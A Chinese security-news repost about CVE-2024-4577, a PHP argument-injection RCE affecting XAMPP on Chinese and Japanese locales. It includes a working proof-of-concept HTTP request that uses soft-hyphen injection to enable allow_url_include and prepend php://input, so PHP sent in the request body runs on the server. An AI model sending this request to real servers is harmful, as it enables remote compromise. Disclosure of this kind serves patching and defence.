PHP+XAMPP超高危漏洞

admin 2024年6月8日01:42:17评论22 views字数 905阅读3分1秒阅读模式

又是摸鱼的一天,在群里吃瓜吹水的时候群U告诉我PHP出了个RCE,可吓人。

漏洞范围

XAMPP 中文/日语地区 PHP

漏洞编号

CVE-2024-4577

漏洞状态

刚刚曝出,按照外文资料发文时间应该是几个小时-十几个小时前

Orange Tsai tweeted a few hours ago about “One of [his] PHP vulnerabilities, which affects XAMPP by default”, and we were curious to say the least. XAMPP is a very popular way for administrators and developers to rapidly deploy Apache, PHP, and a bunch of other tools, and any bug that could give us RCE in its default installation sounds pretty tantalizing.

Orange Tsai几个小时前在推特上发布了关于“他的一个PHP漏洞,默认情况下会影响XAMPP”的消息,至少我们很好奇。XAMPP是管理员和开发人员快速部署Apache、PHP和一系列其他工具的一种非常流行的方式,任何可能在其默认安装中为我们提供RCE的错误听起来都非常诱人。

漏洞POC

POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 Host: {{host}} User-Agent: curl/8.3.0 Accept: / Content-Length: 23 Content-Type: application/x-www-form-urlencoded Connection: keep-alive

<?php phpinfo(); ?>

参考原文(英文资料)

https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/

原文始发于微信公众号(重生之成为赛博女保安):【高危0day】PHP+XAMPP超高危漏洞,影响国区数万主机

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月8日01:42:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   PHP+XAMPP超高危漏洞http://cn-sec.com/archives/2828632.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息